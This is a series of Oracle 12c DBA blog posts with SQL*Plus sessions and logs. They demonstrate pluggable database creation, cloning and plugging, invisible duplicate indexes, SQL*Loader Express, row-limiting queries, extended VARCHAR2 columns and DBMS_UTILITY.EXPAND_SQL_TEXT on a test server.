In the following example I will clone database PDB1 to a new database PDB3 using only the "create pluggable database" command.  First the source database needs to be open read-only.

SQL> alter pluggable database pdb1 close immediate;

Pluggable database altered.

SQL> alter pluggable database pdb1 open read only;

Pluggable database altered.

Then clone the PDB1 to PDB3.

SQL> create pluggable database PDB3 from PDB1
FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdb1','/u01/app/oracle/oradata/T12/pdb3');  

Pluggable database created.

And open both databases read-write.

SQL> alter pluggable database PDB3 open;

Pluggable database altered.

SQL> alter pluggable database PDB1 close immediate;

Pluggable database altered.

SQL> alter pluggable database PDB1 open;

Pluggable database altered.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           READ WRITE
PDB2                           READ WRITE
PDB3                           READ WRITE


Categories: DBA Blogs

Oracle 12c New Features - Plugging and Unplugging Databases

Sun, 2013-06-30 22:35
In a previous blog post I demonstrated creating Pluggable Databases (PDB) in an Oracle 12c Container Database (CDB).  In this test I will demonstrate how easy it is to unplug a PDB from a CDB, and then plugin again.

We currently have one PDB with name PDB1.  We will shutdown, unplug it, and drop it.

SQL> select name from v$pdbs;

NAME
------------------------------
PDB$SEED
PDB1

SQL> alter pluggable database pdb1 close immediate;

Pluggable database altered.

SQL> alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml';

Pluggable database altered.

SQL> drop pluggable database pdb1 keep datafiles;

Pluggable database dropped.

SQL> select name from v$pdbs;

NAME
------------------------------
PDB$SEED

We can now backup the database to tape for later restore, or copy the datafiles and xml file for the pluggable database to another CDB on another server and plugin.  In this example I will just plug the database back into the original CDB.  

Before we plugin we first need to run DBMS_PDB.CHECK_PLUG_COMPATIBILITY to check that the PDB is compatible with the new CDB.

SQL> set serveroutput on
SQL> DECLARE
   compatible BOOLEAN := FALSE;
  2    3  BEGIN
  4     compatible := DBMS_PDB.CHECK_PLUG_COMPATIBILITY(
  5          pdb_descr_file => '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml');
  6     if compatible then
  7        DBMS_OUTPUT.PUT_LINE('Is pluggable PDB2 compatible? YES');
  8     else DBMS_OUTPUT.PUT_LINE('Is pluggable PDB2 compatible? NO');
  9     end if;
 10  END;
 11  /
Is pluggable PDB2 compatible? YES

PL/SQL procedure successfully completed.

As the PDB is compatible with the CDB we can proceed to plug it in. 

SQL> create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE;

Pluggable database created.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           MOUNTED

SQL> alter session set container=PDB1;

Session altered.

SQL> alter database open;

Database altered.

SQL> connect test/test@pdb1;
Connected.


SQL> show con_name



CON_NAME

------------------------------
PDB1

We are now able to login to the plugged in database.

The Alert log entries for these operations are as follows :-

Mon Jul 01 11:14:31 2013
alter pluggable database pdb1 close immediate
Mon Jul 01 11:14:31 2013
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
Pluggable database PDB1 closed
Completed: alter pluggable database pdb1 close immediate
alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml'
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
Completed: alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml'
drop pluggable database pdb1 keep datafiles
Mon Jul 01 11:15:02 2013
Deleted file /u01/app/oracle/oradata/T12/pdb1/pdbseed_temp01.dbf
Completed: drop pluggable database pdb1 keep datafiles
create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE
Mon Jul 01 11:20:45 2013
****************************************************************
Pluggable Database PDB1 with pdb id - 3 is created as UNUSABLE.
If any errors are encountered before the pdb is marked as NEW,
then the pdb must be dropped
****************************************************************
Deleting old file#10 from file$
Deleting old file#11 from file$
Adding new file#12 to file$(old file#10)
Adding new file#13 to file$(old file#11)
Successfully created internal service pdb1 at open
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
****************************************************************

Post plug operations are now complete.
Pluggable database PDB1 with pdb id - 3 is now marked as NEW.
****************************************************************
Completed: create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE
Mon Jul 01 11:29:00 2013
alter database open
Mon Jul 01 11:29:00 2013
Pluggable database PDB1 dictionary check beginning
Pluggable Database PDB1 Dictionary check complete
Opening pdb PDB1 (3) with no Resource Manager plan active

XDB installed.

XDB initialized.
Pluggable database PDB1 opened read write
Completed: alter database open






Categories: DBA Blogs

Oracle 12c New Features - Container and Pluggable Databases

Sun, 2013-06-30 20:30
Oracle 12c introduces "Multitenant Architecture" which allows consolidation of databases via Container Databases (CDB) and Pluggable Databases (PDB)

The CDB database owns the SGA and running processes, and the PDB databases are serviced by those resources.  This new architecture will be a big change for DBAs experienced in managing earlier versions of the Oracle database, so it is worth taking the time to read the documentation and testing extensively before using these new features.  The theory is that many databases sharing one SGA and set of processes should be more efficient that multiple individually managed memory segments, so this feature is specifically aimed at clouds and large companies.


I used the DBCA utility to create a CDB called T12, which also created a small PDB$SEED database.  DBCA is easy to run, and similar to previous versions, so I won't show screen shots here.  It is also possible to create a CDB database using the CREATE DATABASE statement along with the new ENABLE PLUGGABLE DATABASE clause.  


When managing CDBs and PDBs it is important to ensure you know what container you are currently working on.  By default when you login you will end up in CDB$ROOT.  


[oracle@rac1 admin]$ ps -ef | grep pmon
oracle    7830     1  0 09:08 ?        00:00:00 ora_pmon_T12

[oracle@rac1 admin]$ echo $ORACLE_SID

T12

[oracle@rac1 admin]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Mon Jul 1 09:11:11 2013
Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:

Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT

SQL> show con_id

CON_ID
------------------------------
1

By selecting from v$database we can see that we are currently in a CDB.

SQL> select DBID, name, CDB, CON_ID, CON_DBID from v$database;

      DBID NAME      CDB     CON_ID   CON_DBID
---------- --------- --- ---------- ----------
1216820329 T12       YES          0 1216820329

We can select PDB from dba_services to check what PDBs exist.  In this case we have not created any PDBs, so only the CDB T12 is listed against CDB$ROOT.

SQL> select name, pdb from dba_services;

NAME                PDB
----------------------------------------------------------------
SYS$BACKGROUND      CDB$ROOT
SYS$USERS           CDB$ROOT
T12XDB              CDB$ROOT
T12                 CDB$ROOT

SQL> select name, con_id from v$active_services;

NAME                                                  CON_ID
---------------------------------------------------------------- 
T12XDB                                                1
T12                                                   1
SYS$BACKGROUND                                        1
SYS$USERS                                             1

Create a tnsnames.ora entry for connecting to CDB service T12.

T12 =
 (DESCRIPTION =
 (ADDRESS_LIST =
 (ADDRESS = (PROTOCOL = TCP)(HOST = rac1.test.com)(PORT = 1521)))
 (CONNECT_DATA =
 (SERVICE_NAME = T12)
 )
  )

When we try to create a user we find that in a CDB we are are not allowed to create "local" users, but can only create "common" users with usernames starting with "C##"

SQL> create user test identified by test;
create user test identified by test
            *
ERROR at line 1:
ORA-65096: invalid common user or role name

SQL> !oerr ora 65096
65096, 00000, "invalid common user or role name"
// *Cause:  An attempt was made to create a common user or role with a name
//          that wass not valid for common users or roles.  In addition to
//          the usual rules for user and role names, common user and role
//          names must start with C## or c## and consist only of ASCII
//          characters.
// *Action: Specify a valid common user or role name.
//

SQL> create user test identified by test container=current;
create user test identified by test container=current
                               *
ERROR at line 1:
ORA-65049: creation of local user or role is not allowed in CDB$ROOT

SQL> create user c##test identified by test;

User created.

There are now additional data dictionary views to help manage the PDB and CDB databases (names include PDB, CDB).  You will also notice that many data dictionary views now contain a column CON_ID which allows DBAs to check details for a specific CDB or PDB.  

If we select from v$datafile in the new container database we can see that in addition to the datafiles for the CDB T12, there are datafiles listed for database "pdbseed".  The PDB$SEED database is created at the same time as the CDB and can be used as a source to create PDB databases.


SQL> select name, con_id, plugged_in from v$datafile order by 2;

NAME                                           CON_ID PLUGGED_IN
-------------------------------------------------- ---------- ---
/u01/app/oracle/oradata/T12/system01.dbf            1          0
/u01/app/oracle/oradata/T12/sysaux01.dbf            1          0
/u01/app/oracle/oradata/T12/undotbs01.dbf           1          0
/u01/app/oracle/oradata/T12/users01.dbf             1          0
/u01/app/oracle/oradata/T12/pdbseed/system01.dbf    2          0
/u01/app/oracle/oradata/T12/pdbseed/sysaux01.dbf    2          0

6 rows selected.

The PDB$SEED database is mounted read only, so it is possible to explore it, but there are limits to what you can do with this DB.

SQL> select con_id, name, open_mode from v$pdbs;

    CON_ID NAME                                        OPEN_MODE

---------- ------------------------------------------- ---------
         2 PDB$SEED                                    READ ONLY

SQL> alter session set container=PDB$SEED;

Session altered.

SQL> select name from v$database;

NAME
---------
T12

SQL> show con_name

CON_NAME
------------------------------
PDB$SEED

SQL> show con_id

CON_ID
------------------------------
2

SQL> select open_mode from v$database;

OPEN_MODE
--------------------
READ ONLY

SQL> shutdown;
ORA-65017: seed pluggable database may not be dropped or altered

To create our own read-write PDB as a copy of the PDB$SEED database we just need to execute the "create pluggable database" command.

SQL> create pluggable database PDB1 admin user pdb1_admin identified by password roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1');

Pluggable database created.


SQL> select pdb_name, status from cdb_pdbs;

PDB_NAME      STATUS
----------------------------------------------------------------
PDB$SEED      NORMAL
PDB1          NEW

SQL> select name, con_id from v$active_services order by 1;

NAME                                           CON_ID
---------------------------------------------------------------- 
SYS$BACKGROUND                                 1
SYS$USERS                                      1
T12                                            1
T12XDB                                         1
pdb1                                           3

SQL> select name from v$datafile where con_id=3;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/pdb1/system01.dbf
/u01/app/oracle/oradata/T12/pdb1/sysaux01.dbf

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           MOUNTED

We can see from the above that the new PDB was created in MOUNTED state.  We will need to open it if we want to use it.  When we look in the CDB alert log we can see the following :-

Mon Jul 01 10:02:30 2013
create pluggable database PDB1 admin user pdb1_admin identified by * roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1')
Mon Jul 01 10:02:53 2013
****************************************************************
Pluggable Database PDB1 with pdb id - 3 is created as UNUSABLE.
If any errors are encountered before the pdb is marked as NEW,
then the pdb must be dropped
****************************************************************
Deleting old file#5 from file$
Deleting old file#7 from file$
Adding new file#10 to file$(old file#5)
Adding new file#11 to file$(old file#7)
Successfully created internal service pdb1 at open
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
****************************************************************
Post plug operations are now complete.
Pluggable database PDB1 with pdb id - 3 is now marked as NEW.
****************************************************************

Completed: create pluggable database PDB1 admin user pdb1_admin identified by * roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1')

We can open databases individually as follows, or open all PDBs using "alter pluggable database all open;"

SQL> alter session set container=PDB1;

Session altered.

SQL> show con_name

CON_NAME
------------------------------
PDB1

SQL> alter database open;

Database altered.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB1                           READ WRITE

We can see the following in the CDB alert log.

alter database open
Mon Jul 01 10:12:50 2013
Pluggable database PDB1 dictionary check beginning
Pluggable Database PDB1 Dictionary check complete
Opening pdb PDB1 (3) with no Resource Manager plan active

XDB installed.


XDB initialized.

Pluggable database PDB1 opened read write

Completed: alter database open

Create a tnsnames.ora entry for the new PDB using the default service PDB1.

PDB1 =
 (DESCRIPTION =
 (ADDRESS_LIST =
 (ADDRESS = (PROTOCOL = TCP)(HOST = rac1.test.com)(PORT = 1521)))
 (CONNECT_DATA =
 (SERVICE_NAME = PDB1)
 )
  )

Now that we have created a PDB we can create "local" users.

SQL> show con_name

CON_NAME
------------------------------
PDB1

SQL> create user test identified by test;

User created.

SQL> grant create session to test;

Grant succeeded.

It is also possible to grant privileges in the PDB for the "common" users that exist in the CDB.

SQL> grant create session to C##TEST container=ALL;


Grant succeeded.

We can now connect directly to the PDB1 pluggable database using both the "local" and "common" users.

SQL> connect test/test@PDB1
Connected.
SQL> show con_name

CON_NAME

------------------------------
PDB1

SQL> connect C##TEST/test@PDB1
Connected.

SQL> show con_name

CON_NAME
------------------------------
PDB1

When logged into PDBs many data dictionary views will restrict our view of the world via CON_ID so that we can't see records relating to other PDBs.  We can see from the following selects that PDB1 uses the UNDO and REDO files from the container database, but has its own SYSTEM, SYSAUX, TEMP files.

SQL> select name from v$datafile;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/undotbs01.dbf
/u01/app/oracle/oradata/T12/pdb1/system01.dbf
/u01/app/oracle/oradata/T12/pdb1/sysaux01.dbf

SQL> select name from v$tempfile;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/pdb1/pdbseed_temp01.dbf

SQL> select member from v$logfile;

MEMBER
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/redo03.log
/u01/app/oracle/oradata/T12/redo02.log
/u01/app/oracle/oradata/T12/redo01.log

PDB databases can be created from a seed database as demonstrated above, cloned from other PDB databases, or plugged in from previously unplugged PDBs or converted non-CDB databases.  In addition to creating new PDB databases we can also drop, rename, clone, unplug, plug backup, restore, and duplicate.  Check the Oracle documentation for details.

More details here :- Introduction to the Multitenant Architecture
Categories: DBA Blogs

Oracle 12c New Features - multiple indexes on the same set of columns

Fri, 2013-06-28 00:29
With Oracle 12c it is now possible to have multiple indexes on the same set of columns as long as there is a difference between the indexes (index type, partitioning etc), and one is invisible.

This makes it possible to quickly change index strategies with minimum impact to applications.

For this example I will first create a test partitioned table.

SQL> CREATE TABLE test_range
(id  NUMBER(5),
att1 char(1),
att2 char(1),
att3 char(1))
PARTITION BY RANGE(id)
(
PARTITION id_10 VALUES LESS THAN(10),
PARTITION id_20 VALUES LESS THAN(20)
);  

Table created.

Now create a global index on ATT1.

SQL> create index att1_global on test_range(att1) global;

Index created.

Try to create another index on ATT1 with local partitioning, and it fails because the existing index is still visible.

SQL> create index att1_local on test_range(att1) local;
create index att1_local on test_range(att1) local
                                      *
ERROR at line 1:
ORA-01408: such column list already indexed

Try to create an invisible global index on ATT1 and it fails because the structure is the same as the existing index.

SQL> create index att1_global2 on test_range(att1) global invisible;
create index att1_global2 on test_range(att1) global invisible
                                        *
ERROR at line 1:
ORA-01408: such column list already indexed

Try to create an invisible index with local partitioning and it is successful.

SQL> create index att1_local on test_range(att1) local invisible;

Index created.

Try to make the locally partitioned index visible, and it fails because there is another visible index with the same columns.

SQL> alter index att1_local visible;
alter index att1_local visible
*
ERROR at line 1:
ORA-14147: There is an existing VISIBLE index defined on the same set of
columns.

We need to make the existing index invisible first, then make the new index visible.  With this method we can easily test multiple indexing strategies without needing long outages to drop and recreate indexes.

SQL> alter index att1_global invisible;

Index altered.

SQL> alter index att1_local visible;

Index altered.

Categories: DBA Blogs

Oracle 12c New Features - SQL*Loader Express

Thu, 2013-06-27 23:06
Oracle 12c introduces Sql*Loader Express features, which allow users to run sqlldr with minimum configuration.  

The following example shows loading records into table EMPLOYEE from CSV file EMPLOYEE.dat without having to create a control file.


SQL> create table EMPLOYEE (id integer primary key, name varchar2(10));

Table created.

SQL> exit
Disconnected from Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

[oracle@rac1 admin]$ more EMPLOYEE.dat
1,Adam
2,Ben
3,Colin
4,Dean
5,Evan
6,Frank
7,Greg
8,Hank
9,Ian
10,Jack
[oracle@rac1 admin]$ sqlldr test/test TABLE=EMPLOYEE

SQL*Loader: Release 12.1.0.1.0 - Production on Fri Jun 28 11:58:11 2013

Copyright (c) 1982, 2013, Oracle and/or its affiliates.  All rights reserved.

Express Mode Load, Table: EMPLOYEE
Path used:      External Table, DEGREE_OF_PARALLELISM=AUTO
SQL*Loader-816: error creating temporary directory object SYS_SQLLDR_XT_TMPDIR_00000 for file EMPLOYEE.dat
ORA-01031: insufficient privileges
SQL*Loader-579: switching to direct path for the load
SQL*Loader-583: ignoring trim setting with direct path, using value of LDRTRIM
SQL*Loader-584: ignoring DEGREE_OF_PARALLELISM setting with direct path, using value of NONE
Express Mode Load, Table: EMPLOYEE
Path used:      Direct

Load completed - logical record count 10.

Table EMPLOYEE:
  10 Rows successfully loaded.

Check the log file:
  EMPLOYEE.log
for more information about the load.

[oracle@rac1 admin]$ ls EMPLOYEE*
EMPLOYEE.dat  EMPLOYEE.log

[oracle@rac1 admin]$ more EMPLOYEE.log

SQL*Loader: Release 12.1.0.1.0 - Production on Fri Jun 28 11:58:11 2013

Copyright (c) 1982, 2013, Oracle and/or its affiliates.  All rights reserved.

Express Mode Load, Table: EMPLOYEE
Data File:      EMPLOYEE.dat
  Bad File:     EMPLOYEE_%p.bad
  Discard File:  none specified

 (Allow all discards)

Number to load: ALL
Number to skip: 0
Errors allowed: 50
Continuation:    none specified
Path used:      External Table

Table EMPLOYEE, loaded from every logical record.
Insert option in effect for this table: APPEND

Column Name                Position   Len   Term Encl Datatype
-------------------------- ---------- ----- ---- ---- ---------
ID                         FIRST      *     ,         CHARACTER
NAME                       NEXT       *     ,         CHARACTER

Generated control file for possible reuse:
OPTIONS(EXTERNAL_TABLE=EXECUTE, TRIM=LRTRIM)
LOAD DATA
INFILE 'EMPLOYEE'
APPEND
INTO TABLE EMPLOYEE
FIELDS TERMINATED BY ","
(
  ID,
  NAME
)
End of generated control file for possible reuse.

SQL*Loader-816: error creating temporary directory object SYS_SQLLDR_XT_TMPDIR_00000 for file EMPLOYEE.dat
ORA-01031: insufficient privileges

----------------------------------------------------------------
SQL*Loader-579: switching to direct path for the load
SQL*Loader-583: ignoring trim setting with direct path, using value of LDRTRIM
SQL*Loader-584: ignoring DEGREE_OF_PARALLELISM setting with direct path, using value of NONE
----------------------------------------------------------------

Express Mode Load, Table: EMPLOYEE
Data File:      EMPLOYEE.dat
  Bad File:     EMPLOYEE.bad
  Discard File:  none specified

 (Allow all discards)

Number to load: ALL
Number to skip: 0
Errors allowed: 50
Continuation:    none specified
Path used:      Direct

Table EMPLOYEE, loaded from every logical record.
Insert option in effect for this table: APPEND

   Column Name        Position   Len   Term Encl Datatype
--------------------- ---------- ----- ---- ---- ----------------
ID                    FIRST      *     ,         CHARACTER
NAME                  NEXT       *     ,         CHARACTER

Generated control file for possible reuse:
OPTIONS(DIRECT=TRUE)
LOAD DATA
INFILE 'EMPLOYEE'
APPEND
INTO TABLE EMPLOYEE
FIELDS TERMINATED BY ","
(
  ID,
  NAME
)
End of generated control file for possible reuse.

The following index(es) on table EMPLOYEE were processed:
index TEST.SYS_C009860 loaded successfully with 10 keys

Table EMPLOYEE:
  10 Rows successfully loaded.
  0 Rows not loaded due to data errors.
  0 Rows not loaded because all WHEN clauses were failed.
  0 Rows not loaded because all fields were null.

Bind array size not used in direct path.
Column array  rows :    5000
Stream buffer bytes:  256000
Read   buffer bytes: 1048576

Total logical records skipped:          0
Total logical records read:            10
Total logical records rejected:         0
Total logical records discarded:        0
Total stream buffers loaded by SQL*Loader main thread:        1
Total stream buffers loaded by SQL*Loader load thread:        0

Run began on Fri Jun 28 11:58:11 2013
Run ended on Fri Jun 28 11:58:12 2013

Elapsed time was:     00:00:01.27
CPU time was:         00:00:00.02


[oracle@rac1 admin]$ sqlplus test/test

SQL*Plus: Release 12.1.0.1.0 Production on Fri Jun 28 12:05:49 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Last Successful login time: Fri Jun 28 2013 11:58:11 +08:00

Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> select * from employee;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin
         4 Dean
         5 Evan
         6 Frank
         7 Greg
         8 Hank
         9 Ian
        10 Jack


10 rows selected.


Categories: DBA Blogs

Oracle 12c New Features - FETCH FIRST ROWS, OFFSET

Thu, 2013-06-27 22:20
Oracle 12c introduces sql syntax for row limiting.  This makes it easier to retrieve records in sets for display or processing.

Example :-

create table employee (id integer primary key, name varchar2(10));
insert into employee values (1,'Adam');
insert into employee values (2,'Ben');
insert into employee values (3,'Colin');
insert into employee values (4,'Dean');
insert into employee values (5,'Evan');
insert into employee values (6,'Frank');
insert into employee values (7,'Greg');
insert into employee values (8,'Hank');
insert into employee values (9,'Ian');
insert into employee values (10,'Jack');
commit;

SQL> select * from employee order by id fetch first 3 rows only;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin

SQL> select * from employee order by id offset 3 rows fetch next 3 rows only;

        ID NAME
---------- ----------
         4 Dean
         5 Evan
         6 Frank

SQL> select * from employee order by id fetch first 50 percent rows only;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin
         4 Dean
         5 Evan



Categories: DBA Blogs

Oracle 12c New Features - Extended Datatypes VARCHAR2 32767 bytes

Thu, 2013-06-27 21:55
In Oracle 12c it is now possible to create VARCHAR2, NVARCHAR2, and RAW attributes of size 32767 bytes.

This is controlled by new parameter MAX_STRING_SIZE.  The value of the parameter defaults to STANDARD, but if you set it to EXTENDED you can use the expanded variable size.  Consider this carefully, as increased column sizes will have effects on any applications that use the data in variables and parameters and can limit the use of partitions and indexes on the extended datatypes.

In addition to setting MAX_STRING_SIZE=EXTENDED you also need to start the database in "upgrade" mode and run utl32k.sql  Also be aware that if you are running CDB / PDB you may need to upgrade them individually, including the SEED DB.

SQL> alter system set max_string_size=EXTENDED scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> startup upgrade
ORACLE instance started.

Total System Global Area 1636814848 bytes
Fixed Size                  2288968 bytes
Variable Size            1056965304 bytes
Database Buffers          570425344 bytes
Redo Buffers                7135232 bytes
Database mounted.
Database opened.
SQL> @utl32k.sql

Session altered.

DOC>#######################################################################
DOC>#######################################################################
DOC>   The following statement will cause an "ORA-01722: invalid number"
DOC>   error if the database has not been opened for UPGRADE.
DOC>
DOC>   Perform a "SHUTDOWN ABORT"  and
DOC>   restart using UPGRADE.
DOC>#######################################################################
DOC>#######################################################################
DOC>#

no rows selected

DOC>#######################################################################
DOC>#######################################################################
DOC>   The following statement will cause an "ORA-01722: invalid number"
DOC>   error if the database does not have compatible >= 12.0.0
DOC>
DOC>   Set compatible >= 12.0.0 and retry.
DOC>#######################################################################
DOC>#######################################################################
DOC>#

PL/SQL procedure successfully completed.


Session altered.


0 rows updated.


Commit complete.


System altered.


PL/SQL procedure successfully completed.


Commit complete.


System altered.


Session altered.


PL/SQL procedure successfully completed.

No errors.

Session altered.


PL/SQL procedure successfully completed.


Commit complete.


Package altered.


TIMESTAMP
--------------------------------------------------------------------------------
COMP_TIMESTAMP UTLRP_BGN  2013-06-28 10:47:30

DOC>   The following PL/SQL block invokes UTL_RECOMP to recompile invalid
DOC>   objects in the database. Recompilation time is proportional to the
DOC>   number of invalid objects in the database, so this command may take
DOC>   a long time to execute on a database with a large number of invalid
DOC>   objects.
DOC>
DOC>   Use the following queries to track recompilation progress:
DOC>
DOC>   1. Query returning the number of invalid objects remaining. This
DOC>      number should decrease with time.
DOC>         SELECT COUNT(*) FROM obj$ WHERE status IN (4, 5, 6);
DOC>
DOC>   2. Query returning the number of objects compiled so far. This number
DOC>      should increase with time.
DOC>         SELECT COUNT(*) FROM UTL_RECOMP_COMPILED;
DOC>
DOC>   This script automatically chooses serial or parallel recompilation
DOC>   based on the number of CPUs available (parameter cpu_count) multiplied
DOC>   by the number of threads per CPU (parameter parallel_threads_per_cpu).
DOC>   On RAC, this number is added across all RAC nodes.
DOC>
DOC>   UTL_RECOMP uses DBMS_SCHEDULER to create jobs for parallel
DOC>   recompilation. Jobs are created without instance affinity so that they
DOC>   can migrate across RAC nodes. Use the following queries to verify
DOC>   whether UTL_RECOMP jobs are being created and run correctly:
DOC>
DOC>   1. Query showing jobs created by UTL_RECOMP
DOC>         SELECT job_name FROM dba_scheduler_jobs
DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
DOC>
DOC>   2. Query showing UTL_RECOMP jobs that are running
DOC>         SELECT job_name FROM dba_scheduler_running_jobs
DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
DOC>#

PL/SQL procedure successfully completed.


TIMESTAMP
--------------------------------------------------------------------------------
COMP_TIMESTAMP UTLRP_END  2013-06-28 10:47:32

DOC> The following query reports the number of objects that have compiled
DOC> with errors.
DOC>
DOC> If the number is higher than expected, please examine the error
DOC> messages reported with each object (using SHOW ERRORS) to see if they
DOC> point to system misconfiguration or resource constraints that must be
DOC> fixed before attempting to recompile these objects.
DOC>#

OBJECTS WITH ERRORS
-------------------
                  0

DOC> The following query reports the number of errors caught during
DOC> recompilation. If this number is non-zero, please query the error
DOC> messages in the table UTL_RECOMP_ERRORS to see if any of these errors
DOC> are due to misconfiguration or resource constraints that must be
DOC> fixed before objects can compile successfully.
DOC>#

ERRORS DURING RECOMPILATION
---------------------------
                          0


Function created.


PL/SQL procedure successfully completed.


Function dropped.

...Database user "SYS", database schema "APEX_040200", user# "98" 10:47:42
...Compiled 0 out of 2998 objects considered, 0 failed compilation 10:47:43
...263 packages
...255 package bodies
...453 tables
...11 functions
...16 procedures
...3 sequences
...458 triggers
...1322 indexes
...207 views
...0 libraries
...6 types
...0 type bodies
...0 operators
...0 index types
...Begin key object existence check 10:47:43
...Completed key object existence check 10:47:43
...Setting DBMS Registry 10:47:43
...Setting DBMS Registry Complete 10:47:43
...Exiting validate 10:47:43

PL/SQL procedure successfully completed.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> startup
ORACLE instance started.

Total System Global Area 1636814848 bytes
Fixed Size                  2288968 bytes
Variable Size            1056965304 bytes
Database Buffers          570425344 bytes
Redo Buffers                7135232 bytes
Database mounted.
Database opened.
SQL> show parameter max_string_size

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
max_string_size                      string      EXTENDED


SQL> connect test/test
Connected.
SQL> create table employee (emp_id integer, emp_name varchar2(20), life_story varchar2(32000));

Table created.

SQL> desc employee
 Name                                      Null?  Type
 ----------------------------------------- ------ ---------------
 EMP_ID                                           NUMBER(38)
 EMP_NAME                                         VARCHAR2(20)
 LIFE_STORY                                       VARCHAR2(32000)

SQL> select segment_name, segment_type from user_segments;

no rows selected

SQL> insert into employee values (1,'John','Wage Slave');

1 row created.

SQL> commit;

Commit complete.

Looking at the segments that exist we can see that by creating a TABLE with an extended VARCHAR2 column this was actually implemented using a TABLE, LOBSEGMENT, and associated LOBINDEX.

SQL> select segment_name, segment_type from user_segments;

SEGMENT_NAME                          SEGMENT_TYPE
------------------------------------- ---------------------------
EMPLOYEE                              TABLE
SYS_IL0000092103C00003$$              LOBINDEX
SYS_LOB0000092103C00003$$             LOBSEGMENT




Categories: DBA Blogs

Oracle 12c New Features - DBMS_UTILITY.EXPAND_SQL_TEXT

Thu, 2013-06-27 20:34
As a DBA you occasionally get handed SQL statements many hundreds of lines long, and asked to help tune it.  Often the SQL selects from views based on views based on views, which can force the database to access the same table multiple times and join to itself, leading to poor performance.  To work out what the sql is actually doing the DBA needs to extract the sql from every view, merge it, then try to work out if it can be improved.  This can be time consuming, but 12c has introduced DBMS_UTILITY.EXPAND_SQL_TEXT to help.

The following gives and example of expanding a simple sql statement based on a view.


SQL> create table employee (emp_id integer, emp_name varchar2(20));

Table created.

SQL> insert into employee values (1,'John');

1 row created.

SQL> insert into employee values (2,'David');

1 row created.

SQL> commit;

Commit complete.

SQL> create view v1 as select * from employee;

View created.

SQL> create view v2 as select * from employee;

View created.

If we were just given the following piece of SQL we could run it through dbms_utility.expand_sql_text to get a better idea of what the logic in v1 and v2 is.  

SQL> select * from v1 union select * from v2;

    EMP_ID EMP_NAME
---------- --------------------
         1 John
         2 David

SQL> set linesize 32000 pagesize 0 serveroutput on
SQL> declare
   original_sql clob :='select * from v1 union select * from v2';
   expanded_sql clob := empty_clob();
begin
    dbms_utility.expand_sql_text(original_sql,expanded_sql);
    dbms_output.put_line(expanded_sql);
end;
/  
(SELECT "A3"."EMP_ID" "EMP_ID","A3"."EMP_NAME" "EMP_NAME" FROM  (SELECT "A4"."EMP_ID" "EMP_ID","A4"."EMP_NAME" "EMP_NAME" FROM TEST."EMPLOYEE" "A4") "A3")UNION (SELECT "A2"."EMP_ID" "EMP_ID","A2"."EMP_NAME" "EMP_NAME" FROM  (SELECT "A5"."EMP_ID" "EMP_ID","A5"."EMP_NAME" "EMP_NAME" FROM TEST."EMPLOYEE" "A5") "A2")

PL/SQL procedure successfully completed.

So we can see from the expanded query that the original sql was just doing a union of two identical selects from table TEST.EMPLOYEE, which we can easily simplify to a single query with better performance.

# I found the following reference from Jonathan Lewis which indicates this procedure previously existed in package DBMS_SQL2
Categories: DBA Blogs

Pages